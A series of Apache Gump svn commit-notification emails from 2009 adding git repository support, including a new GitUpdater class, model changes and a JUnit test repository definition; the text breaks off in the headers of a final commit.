MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r741415 - /gump/metadata/testbase/junit-repo.xml Date: Fri, 06 Feb 2009 05:21:35 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 6 05:21:33 2009 New Revision: 741415 URL: http://svn.apache.org/viewvc?rev=741415&view=rev Log: git test repo Added: gump/metadata/testbase/junit-repo.xml (with props) Added: gump/metadata/testbase/junit-repo.xml URL: http://svn.apache.org/viewvc/gump/metadata/testbase/junit-repo.xml?rev=741415&view=auto ============================================================================== --- gump/metadata/testbase/junit-repo.xml (added) +++ gump/metadata/testbase/junit-repo.xml Fri Feb 6 05:21:33 2009 @@ -0,0 +1,25 @@ +<?xml version="1.0" encoding="ISO-8859-1"?> +<!-- + Licensed to the Apache Software Foundation (ASF) under one or more + contributor license agreements. See the NOTICE file distributed with + this work for additional information regarding copyright ownership. + The ASF licenses this file to You under the Apache License, Version 2.0 + (the "License"); you may not use this file except in compliance with + the License. You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. +--> + +<repository name="junit" type="git"> + <title>JUnit Test Framework</title> + <home-page>http://sourceforge.net/</home-page> + <cvsweb>http://github.com/KentBeck/junit/tree/master</cvsweb> + <redistributable/> + <url>git://github.com/KentBeck/junit.git</url> +</repository> Propchange: gump/metadata/testbase/junit-repo.xml ------------------------------------------------------------------------------ svn:eol-style = native From [email protected] Fri Feb 06 05:22:22 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3034 invoked from network); 6 Feb 2009 05:22:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Feb 2009 05:22:19 -0000 Received: (qmail 50901 invoked by uid 500); 6 Feb 2009 05:22:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50892 invoked by uid 99); 6 Feb 2009 05:22:19 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Feb 2009 21:22:19 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 06 Feb 2009 05:22:19 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id F396B238896B; Fri, 6 Feb 2009 05:21:58 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r741416 - in /gump/metadata/testbase: junit.xml profile.xml Date: Fri, 06 Feb 2009 05:21:58 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 6 05:21:57 2009 New Revision: 741416 URL: http://svn.apache.org/viewvc?rev=741416&view=rev Log: add a git testbed Modified: gump/metadata/testbase/junit.xml gump/metadata/testbase/profile.xml Modified: gump/metadata/testbase/junit.xml URL: http://svn.apache.org/viewvc/gump/metadata/testbase/junit.xml?rev=741416&r1=741415&r2=741416&view=diff ============================================================================== --- gump/metadata/testbase/junit.xml (original) +++ gump/metadata/testbase/junit.xml Fri Feb 6 05:21:57 2009 @@ -23,7 +23,7 @@ </description> <redistributable/> - <cvs repository="junit" dir="."/> + <git repository="junit"/> <project name="junit"> <package>org.junit</package> Modified: gump/metadata/testbase/profile.xml URL: http://svn.apache.org/viewvc/gump/metadata/testbase/profile.xml?rev=741416&r1=741415&r2=741416&view=diff ============================================================================== --- gump/metadata/testbase/profile.xml (original) +++ gump/metadata/testbase/profile.xml Fri Feb 6 05:21:57 2009 @@ -36,7 +36,8 @@ <repository href="repository/apr.xml"/> <repository href="repository/excalibur-svn.xml"/> <repository href="repository/jakarta-svn.xml"/> - <repository href="repository/junit.xml"/> + <!-- uses GIT --> + <repository href="testbase/junit-repo.xml"/> <repository href="repository/logging.xml"/> <repository href="repository/sourceforge.xml"/> <repository href="repository/xerces.xml"/> From [email protected] Fri Feb 06 06:22:00 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42105 invoked from network); 6 Feb 2009 06:22:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Feb 2009 06:22:00 -0000 Received: (qmail 1076 invoked by uid 500); 6 Feb 2009 06:22:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 1066 invoked by uid 99); 6 Feb 2009 06:22:00 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Feb 2009 22:22:00 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 06 Feb 2009 06:21:58 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id DCD8B2388892; Fri, 6 Feb 2009 06:21:36 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r741429 - /gump/trunk/python/gump/core/update/git.py Date: Fri, 06 Feb 2009 06:21:36 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 6 06:21:36 2009 New Revision: 741429 URL: http://svn.apache.org/viewvc?rev=741429&view=rev Log: initial git updater Added: gump/trunk/python/gump/core/update/git.py (with props) Added: gump/trunk/python/gump/core/update/git.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/git.py?rev=741429&view=auto ============================================================================== --- gump/trunk/python/gump/core/update/git.py (added) +++ gump/trunk/python/gump/core/update/git.py Fri Feb 6 06:21:36 2009 @@ -0,0 +1,206 @@ +#!/usr/bin/python + + +# Licensed to the Apache Software Foundation (ASF) under one or more +# contributor license agreements. See the NOTICE file distributed with +# this work for additional information regarding copyright ownership. +# The ASF licenses this file to You under the Apache License, Version 2.0 +# (the "License"); you may not use this file except in compliance with +# the License. You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" + +""" + +import os.path +import sys +from fnmatch import fnmatch + +from gump import log +from gump.core.run.gumprun import * +from gump.core.config import dir, default, basicConfig + +from gump.util import dump, display, getIndent, logResourceUtilization, \ + invokeGarbageCollection +from gump.util.note import Annotatable +from gump.util.work import * + +from gump.util.tools import * + +from gump.core.model.workspace import * +from gump.core.model.module import Module +from gump.core.model.project import Project +from gump.core.model.depend import ProjectDependency +from gump.core.model.stats import * +from gump.core.model.state import * + +############################################################################### +# Classes +############################################################################### + +class GitUpdater(RunSpecific): + + def __init__(self,run): + RunSpecific.__init__(self,run) + + + def updateModule(self,module): + """ + Perform a GIT update on a module + """ + + log.info('Perform GIT Update on #[' + `module.getPosition()` + \ + '] : ' + module.getName()) + + # Did we 'GIT checkout' already? + exists = os.path.exists(module.getSourceControlStagingDirectory()) + + self.performUpdate(module, exists) + + return module.okToPerformWork() + + def performStatus(self,module): + """ + + Do a status comparison between our copy and server + + """ + + # need to look up how to do that with git + + def getStatusCommand(self,module): + """ + + Build the 'git status --show-updates --non-interative' command + + """ + + # need to look up how to do that with git, this is certainly wrong + + log.debug("Git Module Status : " + module.getName() + \ + ", Repository Name: " + str(module.repository.getName())) + + url=module.git.getRootUrl() + + log.debug("GIT URL: [" + url + "] on Repository: " + module.repository.getName()) + + # + # Prepare GIT checkout/update command... + # + cmd=Cmd('git', 'status_'+module.getName(), + module.getSourceControlStagingDirectory()) + + # + # Be 'quiet' (but not silent) unless requested otherwise. + # + if not module.isDebug() \ + and not module.isVerbose() \ + and not module.git.isDebug() \ + and not module.git.isVerbose(): + cmd.addParameter('--quiet') + + # + # Allow trace for debug + # + # if module.isDebug() or module.git.isDebug(): + # cmd.addParameter('--verbose') + + # do an GIT status + cmd.addParameter('status') + + return cmd + + + def performUpdate(self,module,exists): + """ + + Clone or Pull from GIT + + """ + + # Get the Update Command + (repository, url, cmd ) = self.getUpdateCommand(module, exists) + + + # Execute the command and capture results + cmdResult=execute(cmd, module.getWorkspace().tmpdir) + + # + # Store this as work, on both the module and (cloned) on the repo + # + work=CommandWorkItem(WORK_TYPE_UPDATE,cmd,cmdResult) + module.performedWork(work) + repository.performedWork(work.clone()) + + # Update Context w/ Results + if not cmdResult.isOk(): + log.error('Failed to clone/pull module: ' + module.name) + module.changeState(STATE_FAILED,REASON_UPDATE_FAILED) + else: + module.changeState(STATE_SUCCESS) + + + def preview(self,module): + (repository, url, command ) = self.getUpdateCommand(module,0) + command.dump() + + (repository, url, command ) = self.getUpdateCommand(module,1) + command.dump() + + def getUpdateCommand(self,module,exists=0): + """ + Build the appropriate GIT command for clone/pull + """ + repository=module.repository + + log.debug("Git Module Update : " + module.getName() + \ + ", Repository Name: " + repository.getName()) + + url=module.git.getRootUrl() + + log.debug("GIT URL: [" + url + "] on Repository: " + repository.getName()) + + # + # Prepare GIT clone/pull command... + # + + if exists: + # do a GIT pull inside working copy + cmd=Cmd('git-pull', 'update_'+module.getName(), + module.getSourceControlStagingDirectory()) + else: + # do a GIT clone + cmd=Cmd('git-clone', 'update_'+module.getName(), + module.getWorkspace().getSourceControlStagingDirectory()) + + # + # Be 'quiet' (but not silent) unless requested otherwise. + # + if not module.isDebug() \ + and not module.isVerbose() \ + and not module.git.isDebug() \ + and not module.git.isVerbose(): + cmd.addParameter('--quiet') + + # + # Allow trace for debug + # + # if module.isDebug() or module.git.isDebug(): + # cmd.addParameter('--verbose') + + if not exists: + # do an GIT pull + cmd.addParameter(url) + cmd.addParameter(module.getName()) + + return (module.repository, url, cmd) + + Propchange: gump/trunk/python/gump/core/update/git.py ------------------------------------------------------------------------------ svn:eol-style = native From [email protected] Fri Feb 06 06:22:35 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42196 invoked from network); 6 Feb 2009 06:22:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Feb 2009 06:22:35 -0000 Received: (qmail 1175 invoked by uid 500); 6 Feb 2009 06:22:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 1166 invoked by uid 99); 6 Feb 2009 06:22:34 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Feb 2009 22:22:34 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 06 Feb 2009 06:22:33 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id C4BD32388A23; Fri, 6 Feb 2009 06:22:13 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r741430 - in /gump/trunk/python/gump: actor/document/xdocs/documenter.py core/model/module.py core/model/repository.py core/runner/demand.py core/update/__init__.py core/update/updater.py util/sync.py Date: Fri, 06 Feb 2009 06:22:13 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 6 06:22:13 2009 New Revision: 741430 URL: http://svn.apache.org/viewvc?rev=741430&view=rev Log: quick and dirty support for GIT Modified: gump/trunk/python/gump/actor/document/xdocs/documenter.py gump/trunk/python/gump/core/model/module.py gump/trunk/python/gump/core/model/repository.py gump/trunk/python/gump/core/runner/demand.py gump/trunk/python/gump/core/update/__init__.py gump/trunk/python/gump/core/update/updater.py gump/trunk/python/gump/util/sync.py Modified: gump/trunk/python/gump/actor/document/xdocs/documenter.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/actor/document/xdocs/documenter.py?rev=741430&r1=741429&r2=741430&view=diff ============================================================================== --- gump/trunk/python/gump/actor/document/xdocs/documenter.py (original) +++ gump/trunk/python/gump/actor/document/xdocs/documenter.py Fri Feb 6 06:22:13 2009 @@ -1665,6 +1665,11 @@ repoList.createEntry( "SVN Directory: ", module.svn.getDir()) repoList.createEntry( "SVN URL: ", module.svn.getRootUrl()) + if module.hasGit(): + if module.git.hasDir(): + repoList.createEntry( "GIT Directory: ", module.git.getDir()) + repoList.createEntry( "GIT URL: ", module.git.getRootUrl()) + if module.hasArtifacts(): if module.artifacts.hasUrl(): repoList.createEntry( "Jars URL: ", module.artifacts.getUrl()) Modified: gump/trunk/python/gump/core/model/module.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/model/module.py?rev=741430&r1=741429&r2=741430&view=diff ============================================================================== --- gump/trunk/python/gump/core/model/module.py (original) +++ gump/trunk/python/gump/core/model/module.py Fri Feb 6 06:22:13 2009 @@ -214,6 +214,32 @@ def getGroup(self): return self.group +class ModuleGit(ModelObject): + def __init__(self,dom,repository): + ModelObject.__init__(self,dom) + + # Reference to the shared repository + self.repository=repository + + # Extract settings + self.dir = self.getDomAttributeValue('dir') + + def getRootUrl(self): + url=self.repository.getUrl() + if self.hasDir(): + url+=self.getDir() + return url + + def hasDir(self): + if self.dir: return True + return False + + def getDir(self): + return self.dir + + def getViewUrl(self): + return self.getRootUrl() + class Module(NamedModelObject, Statable, Resultable, Positioned): """Set of Modules (which contain projects)""" def __init__(self,name,dom,owner): @@ -235,6 +261,7 @@ self.svn=None self.artifacts=None self.p4=None + self.git=None self.packaged = False self.redistributable= False @@ -486,6 +513,21 @@ self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) self.addError('No such repository ['+ str(repoName) +'] in workspace on [' \ + self.getName() + ']') + elif self.hasDomChild('git'): + rdom=self.getDomChild('git') + repoName=getDomAttributeValue(rdom,'repository') + if repoName: + if workspace.hasRepository(repoName): + # It references this repository... + repo=workspace.getRepository(repoName) + self.repository=repo + repo.addModule(self) + self.git=ModuleGit(rdom,repo) + else: + self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) + self.addError('No such repository ['+ str(repoName) +'] in workspace on [' \ + + self.getName() + ']') + # Grab all notifications for notifyEntry in self.getDomChildIterator('nag'): @@ -729,7 +771,7 @@ return 'http://svn.apache.org/repos/asf/gump/metadata/' + location def isUpdatable(self): - return self.hasCvs() or self.hasSvn() or self.hasArtifacts() + return self.hasCvs() or self.hasSvn() or self.hasArtifacts() or self.hasGit() def hasCvs(self): if self.cvs: return True @@ -747,6 +789,10 @@ if self.artifacts: return True return False + def hasGit(self): + if self.git: return True + return False + # Where the contents (at the repository) Modified? def isModified(self): return self.modified @@ -774,6 +820,8 @@ return self.svn.getViewUrl() elif self.hasP4(): return self.p4.getViewUrl() + elif self.hasGit(): + return self.git.getViewUrl() class ModuleStatistics(Statistics): """ Modified: gump/trunk/python/gump/core/model/repository.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/model/repository.py?rev=741430&r1=741429&r2=741430&view=diff ============================================================================== --- gump/trunk/python/gump/core/model/repository.py (original) +++ gump/trunk/python/gump/core/model/repository.py Fri Feb 6 06:22:13 2009 @@ -30,7 +30,7 @@ class Repository(NamedModelObject, Statable): """ - A named repository (CVS|SVN|Artifacts) + A named repository (CVS|SVN|Artifacts|GIT) """ def __init__(self,name,dom,workspace): @@ -77,6 +77,13 @@ else: raise RuntimeError, 'No Perforce server on P4 repository: ' + self.getName() self.web=self.getDomChildValue('web') + elif 'git'==type: + self.type='Git' + if self.hasDomChild('url'): + self.url=self.getDomChildValue('url') + else: + raise RuntimeError, 'No URL on GIT repository: ' + self.getName() + self.web=self.getDomChildValue('web') else: raise RuntimeError, 'Invalid Repository Type:' + str(xml.type) Modified: gump/trunk/python/gump/core/runner/demand.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/runner/demand.py?rev=741430&r1=741429&r2=741430&view=diff ============================================================================== --- gump/trunk/python/gump/core/runner/demand.py (original) +++ gump/trunk/python/gump/core/runner/demand.py Fri Feb 6 06:22:13 2009 @@ -76,7 +76,7 @@ def performUpdate(self,module): """ - Perform the (cvs,svn) update of a single module. + Perform the SCM update of a single module. The module is locked during the update. Most of the actual work is delegated to the updater that's provided by the parent GumpRunner Modified: gump/trunk/python/gump/core/update/__init__.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/__init__.py?rev=741430&r1=741429&r2=741430&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/__init__.py (original) +++ gump/trunk/python/gump/core/update/__init__.py Fri Feb 6 06:22:13 2009 @@ -17,6 +17,6 @@ # limitations under the License. # tell Python what modules make up the gump.test package -__all__ = ["updater","cvs","svn","jars"] +__all__ = ["updater","cvs","svn","jars", "git"] Modified: gump/trunk/python/gump/core/update/updater.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/updater.py?rev=741430&r1=741429&r2=741430&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/updater.py (original) +++ gump/trunk/python/gump/core/update/updater.py Fri Feb 6 06:22:13 2009 @@ -31,6 +31,7 @@ from gump.core.update.cvs import CvsUpdater from gump.core.update.svn import SvnUpdater from gump.core.update.p4 import P4Updater +from gump.core.update.git import GitUpdater from gump.util import dump, display, getIndent, logResourceUtilization, \ invokeGarbageCollection @@ -59,6 +60,7 @@ self.cvs=CvsUpdater(run) self.svn=SvnUpdater(run) self.p4=P4Updater(run) + self.git=GitUpdater(run) """ @@ -100,7 +102,7 @@ workspace = self.run.getWorkspace() - log.debug("Workspace CVS|SVN|P4 Directory: " + workspace.getSourceControlStagingDirectory()) + log.debug("Workspace CVS|SVN|P4|GIT Directory: " + workspace.getSourceControlStagingDirectory()) # Update all the modules that have CVS repositories for module in list: @@ -128,6 +130,8 @@ ok=self.svn.updateModule(module) if module.hasP4(): ok=self.p4.updateModule(module) + elif module.hasGit(): + ok=self.git.updateModule(module) else: # :TODO: Now what? pass @@ -202,5 +206,7 @@ ok=self.svn.preview(module) elif module.hasP4(): ok=self.p4.preview(module) + elif module.hasGit(): + ok=self.git.preview(module) else: print 'No updater for module: ' + module.getName() Modified: gump/trunk/python/gump/util/sync.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/util/sync.py?rev=741430&r1=741429&r2=741430&view=diff ============================================================================== --- gump/trunk/python/gump/util/sync.py (original) +++ gump/trunk/python/gump/util/sync.py Fri Feb 6 06:22:13 2009 @@ -198,8 +198,8 @@ linkto = os.readlink(srcname) os.symlink(linkto, dstname) elif os.path.isdir(srcname): - # Copy directories, but not CVS/SVN stuff - if not name in ['CVS','.svn']: + # Copy directories, but not CVS/SVN/GIT stuff + if not name in ['CVS','.svn','.git']: self.copytree(srcname, dstname, symlinks) else: # Selectively copy file From [email protected] Tue Feb 10 05:07:27 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10488 invoked from network); 10 Feb 2009 05:07:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Feb 2009 05:07:27 -0000 Received: (qmail 93542 invoked by uid 500); 10 Feb 2009 05:07:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93531 invoked by uid 99); 10 Feb 2009 05:07:26 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 09 Feb 2009 21:07:26 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Feb 2009 05:07:26 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id C727623889F3; Tue, 10 Feb 2009 05:07:05 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r742853 - /gump/metadata/testbase/junit.xml Date: Tue, 10 Feb 2009 05:07:05 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Tue Feb 10 05:07:03 2009 New Revision: 742853 URL: http://svn.apache.org/viewvc?rev=742853&view=rev Log: make junit compile in my testbed Modified: gump/metadata/testbase/junit.xml Modified: gump/metadata/testbase/junit.xml URL: http://svn.apache.org/viewvc/gump/metadata/testbase/junit.xml?rev=742853&r1=742852&r2=742853&view=diff ============================================================================== --- gump/metadata/testbase/junit.xml (original) +++ gump/metadata/testbase/junit.xml Tue Feb 10 05:07:03 2009 @@ -36,9 +36,9 @@ <depend project="bootstrap-ant"/> <depend project="xml-apis"/> <depend project="xml-xerces"/> - <work nested="bin"/> - <work nested="lib/hamcrest-core-1.1.jar" /> - + <!--depend project="hamcrest-java"/--> + <work nested="lib/hamcrest-core-1.1.jar"/> + <work nested="target/main"/> <home nested="dist"/> <jar name="junit-@@DATE@@.jar" id="junit"/> From [email protected] Wed Feb 11 04:38:05 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59171 invoked from network); 11 Feb 2009 04:38:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2009 04:38:05 -0000 Received: (qmail 87168 invoked by uid 500); 11 Feb 2009 04:38:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87159 invoked by uid 99); 11 Feb 2009 04:38:05 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Feb 2009 20:38:05 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Feb 2009 04:38:02 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id C6E362388A2E; Wed, 11 Feb 2009 04:37:41 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r743217 - /gump/trunk/python/gump/core/run/gumpenv.py Date: Wed, 11 Feb 2009 04:37:40 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Wed Feb 11 04:37:39 2009 New Revision: 743217 URL: http://svn.apache.org/viewvc?rev=743217&view=rev Log: baby steps towards less copy-paste Modified: gump/trunk/python/gump/core/run/gumpenv.py Modified: gump/trunk/python/gump/core/run/gumpenv.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/run/gumpenv.py?rev=743217&r1=743216&r2=743217&view=diff ============================================================================== --- gump/trunk/python/gump/core/run/gumpenv.py (original) +++ gump/trunk/python/gump/core/run/gumpenv.py Wed Feb 11 04:37:39 2009 @@ -161,58 +161,41 @@ if not self.noJavac and not self._checkExecutable('java com.sun.tools.javac.Main','-help',False,False,'check_java_compiler'): self.noJavac=True - if not self.noCvs and not self._checkExecutable('cvs','--version',False): - self.noCvs=True - self.addWarning('"cvs" command not found, no CVS repository updates') - - if not self.noSvn and not self._checkExecutable('svn','--version',False): - self.noSvn=True - self.addWarning('"svn" command not found, no SVN repository updates') - - if not self.noP4 and not self._checkExecutable('p4','-V',False): - self.noP4=True - self.addWarning('"p4" command not found, no Perforce repository updates') - - if not self.noMaven and \ - not self._checkExecutable('maven','--version',False,False,'check_maven'): - self.noMaven=True - self.addWarning('"maven" command not found, no Maven builds') - - if not self.noMaven2 and \ - not self._checkExecutable('mvn','--version',False,False,'check_maven2'): - self.noMaven=True - self.addWarning('"mvn" command not found, no Maven2 builds') - - if not self.noNAnt and \ - not self._checkExecutable('NAnt','-help',False,False,'check_NAnt'): - self.noNAnt=True - self.addWarning('"NAnt" command not found, no NAnt builds') - - if not self.noMono and \ - not self._checkExecutable('mono','--help',False,False,'check_mono'): - self.noMono=True - self.addWarning('"Mono" command not found, no Mono runtime') + self.noCvs = self._checkWithDashVersion('cvs', + 'no CVS repository updates') + + self.noSvn = self._checkWithDashVersion('svn', + 'no svn repository updates') + + self.noP4 = self._checkWithDashVersion('p4', + 'no Perforce repository updates', + '-V') + + self.noMaven = not self.noMaven and not \ + self._checkWithDashVersion('maven', "no Maven 1.x builds") + - if not self.noMake and \ - not self._checkExecutable('make','--help',False,False,'check_Make'): - self.noMake=True - self.addWarning('"make" command not found, no make builds') + self.noMaven2 = not self.noMaven2 and not \ + self._checkWithDashVersion('mvn', "no Maven 2.x builds") + + self.noNAnt = self._checkWithDashVersion('NAnt', "no NAnt builds") + + self.noMono = self._checkWithDashVersion('mono', "no Mono runtime") + + self.noMake = self._checkWithDashVersion('make', "no make builds") - if not self.noGit and not self._checkExecutable('git','--version',False): - self.noGit=True - self.addWarning('"git" command not found, no GIT repository updates') - - if not self.noDarcs and not self._checkExecutable('darcs','--version',False): - self.noDarcs=True - self.addWarning('"darcs" command not found, no DARCS repository updates') - - if not self.noHg and not self._checkExecutable('hg','--version',False): - self.noHg=True - self.addWarning('"hg" command not found, no Mercurial repository updates') - - if not self.noBzr and not self._checkExecutable('bzr','--version',False): - self.noBzr=True - self.addWarning('"bzr" command not found, no Bazar repository updates') + self.noGit = self._checkWithDashVersion('git', + 'no git repository updates') + + self.noDarcs = self._checkWithDashVersion('darcs', + 'no darcs repository updates') + + self.noHg = self._checkWithDashVersion('hg', + 'no Mercurial repository updates') + + self.noBzr = self._checkWithDashVersion('bzr', + 'no Bazar repository updates') + self.checked = True @@ -290,6 +273,18 @@ return self.javaProperties + def _checkWithDashVersion(self,commandName,consequence,version='--version'): + """ + Determine whether a particular command is or is not available + by using the --version switch + """ + ok = self._checkExecutable(commandName, version, False, False, + 'check_' + commandName) + if not ok: + self.addWarning('"' + commandName + '" command not found, ' + + consequence) + return ok + def _checkExecutable(self,command,options,mandatory,logOutput=False,name=None): """ Determine whether a particular command is or is not available. From [email protected] Wed Feb 11 04:52:40 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63531 invoked from network); 11 Feb 2009 04:52:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2009 04:52:37 -0000 Received: (qmail 2443 invoked by uid 500); 11 Feb 2009 04:52:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 2416 invoked by uid 99); 11 Feb 2009 04:52:35 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Feb 2009 20:52:35 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Feb 2009 04:52:33 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 709D02388A9A; Wed, 11 Feb 2009 04:52:13 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r743223 - in /gump/trunk: python/gump/commands/ python/gump/core/runner/ python/gump/test/ python/gump/test/resources/full1/ python/misc/ src/documentation/content/xdocs/ Date: Wed, 11 Feb 2009 04:52:08 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Wed Feb 11 04:52:05 2009 New Revision: 